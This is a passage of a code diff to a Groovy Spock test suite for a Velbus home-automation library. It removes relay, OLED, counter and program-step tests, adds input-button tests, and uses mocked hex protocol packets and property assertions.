-        conditions.eventually {
-            assert device.getPropertyValue("SUNRISE_ENABLED")
-            assert !device.getPropertyValue("SUNSET_ENABLED")
-        }
-
-        when: "we enable program steps on channel 13"
-        device.writeProperty("CH13" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX, true)
-
-        then: "channel 13 program steps should be enabled and all channel program steps should now show as enabled"
-        conditions.eventually {
-            assert device.getPropertyValue("CH13" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
-            assert device.getPropertyValue("ALL" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
-        }
-
-        when: "all channel program steps are disabled for 1s"
-        device.writeProperty("ALL" + ProgramsProcessor.PROGRAM_STEPS_DISABLED_SECONDS_SUFFIX, 1d)
-
-        then: "all channels should show as disabled"
-        conditions.eventually {
-            assert !device.getPropertyValue("ALL" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
-            1.upto(24, {
-                assert !device.getPropertyValue("CH" + it + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
-            })
-        }
-
-        when: "the module re-enables the channels"
-        // Note below packets only used when mock message procoessor is used by the VelbusNetwork
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 30 07 ED 00 FF FF 00 00 99 3B 04 00"))
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 31 07 ED 00 FF FF 00 00 99 3A 04 00"))
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 32 07 ED 00 FF FF 00 00 99 39 04 00"))
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 33 07 ED 00 FF FF 00 00 99 38 04 00"))
-
-        then: "all channels should show as enabled again"
-        conditions.eventually {
-            assert device.getPropertyValue("ALL" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
-            1.upto(24, {
-                assert device.getPropertyValue("CH" + it + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
-
-            })
-        }
-
-        when: "all channel 20 program steps are disabled for 1s"
-        device.writeProperty("CH20" + ProgramsProcessor.PROGRAM_STEPS_DISABLED_SECONDS_SUFFIX, 1d)
-
-        then: "only channel 20 should show as disabled"
-        conditions.eventually {
-            assert !device.getPropertyValue("ALL" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
-            1.upto(24, {
-                def programStepsEnabled = it != 20
-                assert device.getPropertyValue("CH" + it + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX) == programStepsEnabled
-            })
-        }
-
-        when: "the module re-enables the channel"
-        // Note below packets only used when mock message procoessor is used by the VelbusNetwork
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 30 07 ED 00 FF FF 00 00 99 3B 04 00"))
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 31 07 ED 00 FF FF 00 00 99 3A 04 00"))
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 32 07 ED 00 FF FF 00 00 99 39 04 00"))
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 33 07 ED 00 FF FF 00 00 99 38 04 00"))
-
-        then: "all channels should show as enabled again"
-        conditions.eventually {
-            assert device.getPropertyValue("ALL" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
-            1.upto(24, {
-                assert device.getPropertyValue("CH" + it + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX)
-
-            })
-        }
-
-        when: "the current program is changed to winter"
-        device.writeProperty("PROGRAM", ProgramsProcessor.Program.WINTER.name())
-
-        then: "the program should update"
-        conditions.eventually {
-            assert device.getPropertyValue("PROGRAM") == ProgramsProcessor.Program.WINTER
-        }
-
-        when: "the master alarm 1 wake and sleep times are updated"
-        device.writeProperty("ALARM1_WAKE_TIME", "04:00")
-        device.writeProperty("ALARM1_BED_TIME", "20:00")
-
-        then: "the properties should update"
-        conditions.eventually {
-            assert device.getPropertyValue("ALARM1_WAKE_TIME") == "04:00"
-            assert device.getPropertyValue("ALARM1_BED_TIME") == "20:00"
-        }
-
-        cleanup: "return initial state"
-        if (device != null) {
-            device.writeProperty("ALARM1_ENABLED", true)
-            device.writeProperty("ALARM2_ENABLED", false)
-            device.writeProperty("SUNRISE_ENABLED", false)
-            device.writeProperty("SUNSET_ENABLED", true)
-            device.writeProperty("ALL" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX, true)
-            device.writeProperty("CH13" + ProgramsProcessor.PROGRAM_STEPS_ENABLED_SUFFIX, false)
-            device.writeProperty("PROGRAM", ProgramsProcessor.Program.SUMMER.name())
-            device.writeProperty("ALARM1_WAKE_TIME", "16:00")
-            device.writeProperty("ALARM1_BED_TIME", "22:00")
-        }
+      })
     }
 
-    def "OLED Processor Test"() {
-
-        when: "A device property value consumer is registered for device address 48 (VMBGPOD)"
-        Object gpodMemoText;
-        network.addPropertyValueConsumer(48, "MEMO_TEXT", {
-            newValue -> gpodMemoText = newValue;
-        })
-        VelbusDevice device = network.getDevice(48)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMBGPOD
-            assert device.getBaseAddress() == 48
+    and: "the input button property values should be initialised"
+    conditions.eventually {
+      1.upto(32, {
+        if (it >= 25 && it <= 32) {
+          assert device.getPropertyValue("CH" + it) == InputProcessor.ChannelState.RELEASED
+          assert !device.getPropertyValue("CH" + it + "_ENABLED")
+          assert device.getPropertyValue("CH" + it + "_LED") == FeatureProcessor.LedState.OFF
+          assert !device.getPropertyValue("CH" + it + "_LOCKED")
+        } else {
+          assert device.getPropertyValue("CH" + it) == InputProcessor.ChannelState.RELEASED
+          assert device.getPropertyValue("CH" + it + "_LED") == FeatureProcessor.LedState.OFF
+          assert !device.getPropertyValue("CH" + it + "_LOCKED")
+          assert device.getPropertyValue("CH" + it + "_ENABLED")
         }
-
-        and: "the OLED property values should be initialised"
-        conditions.eventually {
-            assert device.getPropertyValue("MEMO_TEXT") == ""
-        }
-
-        and: "eventually the message queue should become empty"
-        conditions.eventually {
-            assert network.messageQueue.size() == 0
-        }
-
-        when: "some memo text is sent to the device"
-        def msg = "Hello world. This is a test message for the OLED panels to make sure they work:30"
-        messageProcessor.sentMessages.clear()
-        device.writeProperty("MEMO_TEXT", msg)
-
-        then: "the memo text property should contain the text and the correct packets should have been sent to the device"
-        if (network.client == messageProcessor) {
-            conditions.eventually {
-                assert device.getPropertyValue("MEMO_TEXT") == msg.substring(0, 62)
-                assert messageProcessor.sentMessages.size() >= 13
-                def firstPacketIndex = messageProcessor.sentMessages.indexOf("0F FB 30 08 AC 00 00 48 65 6C 6C 6F 1E 04")
-                assert firstPacketIndex >= 0
-                assert messageProcessor.sentMessages[firstPacketIndex + 1].toString() == "0F FB 30 08 AC 00 05 20 77 6F 72 6C 29 04"
-                assert messageProcessor.sentMessages[firstPacketIndex + 2].toString() == "0F FB 30 08 AC 00 0A 64 2E 20 54 68 9A 04"
-                assert messageProcessor.sentMessages[firstPacketIndex + 3].toString() == "0F FB 30 08 AC 00 0F 69 73 20 69 73 2B 04"
-                assert messageProcessor.sentMessages[firstPacketIndex + 4].toString() == "0F FB 30 08 AC 00 14 20 61 20 74 65 84 04"
-                assert messageProcessor.sentMessages[firstPacketIndex + 5].toString() == "0F FB 30 08 AC 00 19 73 74 20 6D 65 20 04"
-                assert messageProcessor.sentMessages[firstPacketIndex + 6].toString() == "0F FB 30 08 AC 00 1E 73 73 61 67 65 E1 04"
-                assert messageProcessor.sentMessages[firstPacketIndex + 7].toString() == "0F FB 30 08 AC 00 23 20 66 6F 72 20 68 04"
-                assert messageProcessor.sentMessages[firstPacketIndex + 8].toString() == "0F FB 30 08 AC 00 28 74 68 65 20 4F 3A 04"
-                assert messageProcessor.sentMessages[firstPacketIndex + 9].toString() == "0F FB 30 08 AC 00 2D 4C 45 44 20 70 80 04"
-                assert messageProcessor.sentMessages[firstPacketIndex + 10].toString() == "0F FB 30 08 AC 00 32 61 6E 65 6C 73 CD 04"
-                assert messageProcessor.sentMessages[firstPacketIndex + 11].toString() == "0F FB 30 08 AC 00 37 20 74 6F 20 6D 4B 04"
-                assert messageProcessor.sentMessages[firstPacketIndex + 12].toString() == "0F FB 30 06 AC 00 3C 61 6B 00 0C 04 00 00"
-            }
-        }
-
-        cleanup: "put the device state back"
-        if (device != null) {
-            device.writeProperty("MEMO_TEXT", "")
-        }
+      })
     }
 
-    def "Relay Processor Test"() {
+    when: "a button is long pressed on the device"
+    network.client.onMessageReceived(VelbusPacket.fromString("0F F8 32 04 00 00 00 20 A3 04 00 00 00 00"))
 
-        when: "A device property value consumer is registered for device address 81 (VMB1RYNO)"
-        Object relayChannel1State;
-        network.addPropertyValueConsumer(81, "CH1", {
-            newValue -> relayChannel1State = newValue;
-        })
-        VelbusDevice device = network.getDevice(81)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMB1RYNO
-            assert device.getBaseAddress() == 81
-        }
-
-        and: "the relay property values should be initialised"
-        conditions.eventually {
-            assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH3") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH4") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH5") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH5_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert !device.getPropertyValue("CH1_LOCKED")
-            assert !device.getPropertyValue("CH2_LOCKED")
-            assert !device.getPropertyValue("CH3_LOCKED")
-            assert !device.getPropertyValue("CH4_LOCKED")
-            assert !device.getPropertyValue("CH5_LOCKED")
-            assert !device.getPropertyValue("CH1_INHIBITED")
-            assert !device.getPropertyValue("CH2_INHIBITED")
-            assert !device.getPropertyValue("CH3_INHIBITED")
-            assert !device.getPropertyValue("CH4_INHIBITED")
-            assert !device.getPropertyValue("CH5_INHIBITED")
-            assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("CH5_LED") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "a relay is switched on"
-        device.writeProperty("CH4", true)
-
-        then: "a relay should be on"
-        conditions.eventually {
-            assert device.getPropertyValue("CH4") == RelayProcessor.ChannelState.ON
-            assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-        }
-
-        when: "a relay is switched off"
-        device.writeProperty("CH4", false)
-
-        then: "a relay should be off"
-        conditions.eventually {
-            assert device.getPropertyValue("CH4") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-        }
-
-        when: "a relay is set to intermittent"
-        device.writeProperty("CH1", RelayProcessor.ChannelState.INTERMITTENT.name())
-
-        then: "the relay should be in intermittent mode"
-        conditions.eventually {
-            assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.INTERMITTENT
-            assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.FAST
-        }
-
-        when: "the relay is switched off again"
-        device.writeProperty("CH1", false)
-
-        then: "the relay should be off"
-        conditions.eventually {
-            assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "a relay is set to intermittent for 1s"
-        device.writeProperty("CH2_INTERMITTENT", 1d)
-
-        then: "the relay should be in intermittent state"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.INTERMITTENT
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.FAST
-        }
-
-        and: "the relay should return to normal after 1s"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-        }
-
-        when: "a relay is set to intermittent indefinitely"
-        device.writeProperty("CH2_INTERMITTENT", -1d)
-
-        then: "the relay should be in intermittent state"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.INTERMITTENT
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_LED") == FeatureProcessor.LedState.FAST
-        }
-
-        when: "the relay intermittent state is cancelled"
-        device.writeProperty("CH2_INTERMITTENT", 0d)
-
-        then: "the relay should return to normal"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-        }
-
-        when: "a relay is inhibited for 1s"
-        device.writeProperty("CH2_INHIBIT", 1d)
-
-        then: "the relay should be inhibited"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.INHIBITED
-        }
-
-        and: "the relay should return to normal after 1s"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-        }
-
-        when: "a relay is inhibited indefinitely"
-        device.writeProperty("CH2_INHIBIT", -1d)
-
-        then: "the relay should be inhibited"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.INHIBITED
-        }
-
-        when: "the relay inhibit is cancelled"
-        device.writeProperty("CH2_INHIBIT", 0d)
-
-        then: "the relay should return to normal"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-        }
-
-        when: "a relay is forced on for 1s"
-        device.writeProperty("CH3_FORCE_ON", 1d)
-
-        then: "a relay should be on"
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == RelayProcessor.ChannelState.ON
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.FORCED
-            assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.ON
-        }
-
-        and: "the relay should switch off again"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 04 00 00 00 00 00 00 9E 04"))
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 30 02 F5 02 CD 04 00 00 00 00 00 00"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH3") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH3_LED") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "a relay is locked for 1s"
-        device.writeProperty("CH1_LOCK", 1d)
-
-        then: "the relay should be off and disabled (forced off)"
-        conditions.eventually {
-            assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.LOCKED
-            assert device.getPropertyValue("CH1_LOCKED")
-            assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.OFF
-        }
-
-        and: "the relay should return to normal"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 01 00 00 00 00 00 00 A1 04"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "a relay is switched on for 1s"
-        device.writeProperty("CH1_ON", 1d)
-
-        then: "the relay should be on and in normal state"
-        conditions.eventually {
-            assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.ON
-            assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.FAST
-        }
-
-        and: "the relay should return to off"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 01 00 00 00 00 00 00 A1 04"))
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 40 02 F5 01 BE 04 00 00 00 00 00 00"))
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F F8 51 04 00 00 01 00 A3 04 00 00 00 00"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "a relay is switched on indefinitely"
-        device.writeProperty("CH1_ON", -1d)
-
-        then: "the relay should be on and in normal state"
-        conditions.eventually {
-            assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.ON
-            assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.ON
-        }
-
-        when: "we cancel the on timer"
-        device.writeProperty("CH1_ON", 0d)
-
-        then: "the relay should return to off"
-        conditions.eventually {
-            assert device.getPropertyValue("CH1") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH1_LED") == FeatureProcessor.LedState.OFF
-        }
-
-        when: "a relay is locked for 1s"
-        device.writeProperty("CH2_LOCK", 1d)
-
-        then: "the relay should be disabled"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.LOCKED
-        }
-
-        and: "the relay should return to normal after 1s"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-        }
-
-        when: "a relay is locked indefinitely"
-        device.writeProperty("CH2_LOCK", -1d)
-
-        then: "the relay should be locked"
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.LOCKED
-        }
-
-        when: "the relay lock is cancelled"
-        device.writeProperty("CH2_LOCK", 0d)
-
-        then: "the relay should return to normal"
-        messageProcessor.onMessageReceived(VelbusPacket.fromString("0F FB 51 08 FB 02 00 00 00 00 00 00 A0 04"))
-        conditions.eventually {
-            assert device.getPropertyValue("CH2") == RelayProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-        }
-
-        cleanup: "put the device state back"
-        if (device != null) {
-            device.writeProperty("CH1", false)
-            device.writeProperty("CH2", false)
-            device.writeProperty("CH3", false)
-            device.writeProperty("CH4", false)
-            device.writeProperty("CH5", false)
-        }
+    then: "the property value should change to LONG_PRESSED"
+    conditions.eventually {
+      assert gpodChannel22 == InputProcessor.ChannelState.LONG_PRESSED
+      assert device.getPropertyValue("CH22") == InputProcessor.ChannelState.LONG_PRESSED
     }
 
-    def "Counter Processor Test"() {
+    when: "the button is released on the device"
+    network.client.onMessageReceived(VelbusPacket.fromString("0F F8 32 04 00 00 20 00 A3 04 00 00 00 00"))
 
-        when: "A device property value consumer is registered for device address 10 (VMB7IN)"
-        Object vmb7InCounter1;
-        network.addPropertyValueConsumer(10, "COUNTER1", {
-            newValue -> vmb7InCounter1 = newValue;
-        })
-        VelbusDevice device = network.getDevice(10)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMB7IN
-            assert device.getBaseAddress() == 10
-        }
-
-        and: "the counter property values should be initialised"
-        conditions.eventually {
-            1.upto(4, {
-                if (it == 1) {
-                    assert device.getPropertyValue("COUNTER" + it + "_ENABLED")
-                    assert device.getPropertyValue("COUNTER" + it) == 0d
-                    assert device.getPropertyValue("COUNTER" + it + "_INSTANT") == 0.02
-                    assert device.getPropertyValue("COUNTER" + it + "_UNITS") == CounterProcessor.CounterUnits.LITRES
-                } else if (it == 2) {
-                        assert device.getPropertyValue("COUNTER" + it + "_ENABLED")
-                        assert device.getPropertyValue("COUNTER" + it) == 0d
-                        assert device.getPropertyValue("COUNTER" + it + "_INSTANT") == 140d
-                        assert device.getPropertyValue("COUNTER" + it + "_UNITS") == CounterProcessor.CounterUnits.KILOWATTS
-                } else {
-                    assert !device.getPropertyValue("COUNTER" + it + "_ENABLED")
-                    assert device.getPropertyValue("COUNTER" + it) == 0d
-                    assert device.getPropertyValue("COUNTER" + it + "_INSTANT") == 0d
-                    assert device.getPropertyValue("COUNTER" + it + "_UNITS") == null
-                }
-            })
-        }
-
-        when: "the counter updates on the device"
-        network.client.onMessageReceived(VelbusPacket.fromString("0F FB 0A 08 BE 68 00 00 00 71 23 46 E4 04"))
-
-        then: "the counter should update to match"
-        conditions.eventually {
-            assert device.getPropertyValue("COUNTER1") == 0.04
-            assert device.getPropertyValue("COUNTER1_INSTANT") == 0.15
-        }
-
-        when: "the counter is reset"
-        device.writeProperty("COUNTER1_RESET", AttributeExecuteStatus.REQUEST_START)
-
-        then: "the counter should update to match"
-        conditions.eventually {
-            assert device.getPropertyValue("COUNTER1") == 0d
-            assert device.getPropertyValue("COUNTER1_INSTANT") == 0.02
-        }
+    then: "the property value should return to RELEASED"
+    conditions.eventually {
+      assert gpodChannel22 == InputProcessor.ChannelState.RELEASED
+      assert device.getPropertyValue("CH22") == InputProcessor.ChannelState.RELEASED
     }
 
-    // TODO: Add tests for VMB4AN once protocol doc is finished
-    def "Analog Output Processor Test"() {
+    when: "a button is pressed on the device"
+    network.client.onMessageReceived(VelbusPacket.fromString("0F F8 32 04 00 20 00 00 A3 04 00 00 00 00"))
 
-        when: "A device property value consumer is registered for device address 187 (VMB4DC)"
-        Object output1State;
-        network.addPropertyValueConsumer(2, "OUTPUT1", {
-            newValue -> output1State = newValue;
-        })
-        VelbusDevice device = network.getDevice(2)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMB4AN
-            assert device.getBaseAddress() == 2
-        }
-
-        and: "the IO module property values should be initialised"
-        conditions.eventually {
-            assert device.getPropertyValue("OUTPUT1") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("OUTPUT2") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("OUTPUT3") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("OUTPUT4") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("OUTPUT1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("OUTPUT2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("OUTPUT3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("OUTPUT4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert !device.getPropertyValue("OUTPUT1_LOCKED")
-            assert !device.getPropertyValue("OUTPUT2_LOCKED")
-            assert !device.getPropertyValue("OUTPUT3_LOCKED")
-            assert !device.getPropertyValue("OUTPUT4_LOCKED")
-            assert !device.getPropertyValue("OUTPUT1_INHIBITED")
-            assert !device.getPropertyValue("OUTPUT2_INHIBITED")
-            assert !device.getPropertyValue("OUTPUT3_INHIBITED")
-            assert !device.getPropertyValue("OUTPUT4_INHIBITED")
-            assert device.getPropertyValue("OUTPUT1_LED") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("OUTPUT2_LED") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("OUTPUT3_LED") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("OUTPUT4_LED") == FeatureProcessor.LedState.OFF
-            assert device.getPropertyValue("OUTPUT1_VALUE") == 0d
-            assert device.getPropertyValue("OUTPUT2_VALUE") == 0d
-            assert device.getPropertyValue("OUTPUT3_VALUE") == 0d
-            assert device.getPropertyValue("OUTPUT4_VALUE") == 0d
-        }
-
-//        when: "an output channel is switched on"
-//        device.writeProperty("OUTPUT4", true)
-//
-//        then: "the output should be on 100%"
-//        conditions.eventually {
-//            assert device.getPropertyValue("OUTPUT4") == AnalogOutputProcessor.ChannelState.ON
-//            assert device.getPropertyValue("OUTPUT4_VALUE") == 3839
-//            assert device.getPropertyValue("OUTPUT4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-//            assert device.getPropertyValue("CH4_LED") == FeatureProcessor.LedState.ON
-//        }
-//
-//        when: "the output is switched off"
-//        device.writeProperty("OUTPUT4", false)
-//
-//        then: "the output should be off"
-//        conditions.eventually {
-//            assert device.getPropertyValue("OUTPUT4") == AnalogOutputProcessor.ChannelState.OFF
-//            assert device.getPropertyValue("OUTPUT4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-//            assert device.getPropertyValue("OUTPUT4_LED") == FeatureProcessor.LedState.OFF
-//        }
-//
-//        when: "a output channel is set to 50%"
-//        device.writeProperty("OUTPUT4_LEVEL", 50d)
-//
-//        then: "the output should be on 5V"
-//        conditions.eventually {
-//            assert device.getPropertyValue("OUTPUT4") == AnalogOutputProcessor.ChannelState.ON
-//            assert device.getPropertyValue("OUTPUT4_VALUE") == 50000
-//            assert device.getPropertyValue("OUTPUT4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-//            assert device.getPropertyValue("OUTPUT4_LED") == FeatureProcessor.LedState.ON
-//        }
-//
-//        when: "the output is switched off"
-//        device.writeProperty("OUTPUT4", false)
-//
-//        then: "the output should be off"
-//        conditions.eventually {
-//            assert device.getPropertyValue("OUTPUT4") == AnalogOutputProcessor.ChannelState.OFF
-//            assert device.getPropertyValue("OUTPUT4_VALUE") == 0
-//            assert device.getPropertyValue("OUTPUT4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-//            assert device.getPropertyValue("OUTPUT4_LED") == FeatureProcessor.LedState.OFF
-//        }
-//
-//        when: "a output channel is set to last"
-//        device.writeProperty("OUTPUT4", AnalogOutputProcessor.ChannelState.LAST.objectToValue(STRING))
-//
-//        then: "the output should go to 5V"
-//        conditions.eventually {
-//            assert device.getPropertyValue("OUTPUT4") == AnalogOutputProcessor.ChannelState.ON
-//            assert device.getPropertyValue("OUTPUT4_VALUE") == 50000
-//            assert device.getPropertyValue("OUTPUT4_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-//            assert device.getPropertyValue("OUTPUT4_LED") == FeatureProcessor.LedState.ON
-//        }
-
-
-        when: "A device property value consumer is registered for device address 187 (VMB4DC)"
-        Object dimmerChannel1State;
-        network.addPropertyValueConsumer(187, "CH1", {
-            newValue -> dimmerChannel1State = newValue;
-        })
-        device = network.getDevice(187)
-
-        then: "The device should be created and become initialised"
-        conditions.eventually {
-            assert device != null
-            assert device.getDeviceType() == VelbusDeviceType.VMB4DC
-            assert device.getBaseAddress() == 187
-        }
-
-        and: "the dimmer property values should be initialised"
-        conditions.eventually {
-            assert device.getPropertyValue("CH1") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH2") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH3") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH4") == AnalogOutputProcessor.ChannelState.OFF
-            assert device.getPropertyValue("CH1_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH2_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
-            assert device.getPropertyValue("CH3_SETTING") == OutputChannelProcessor.ChannelSetting.NORMAL
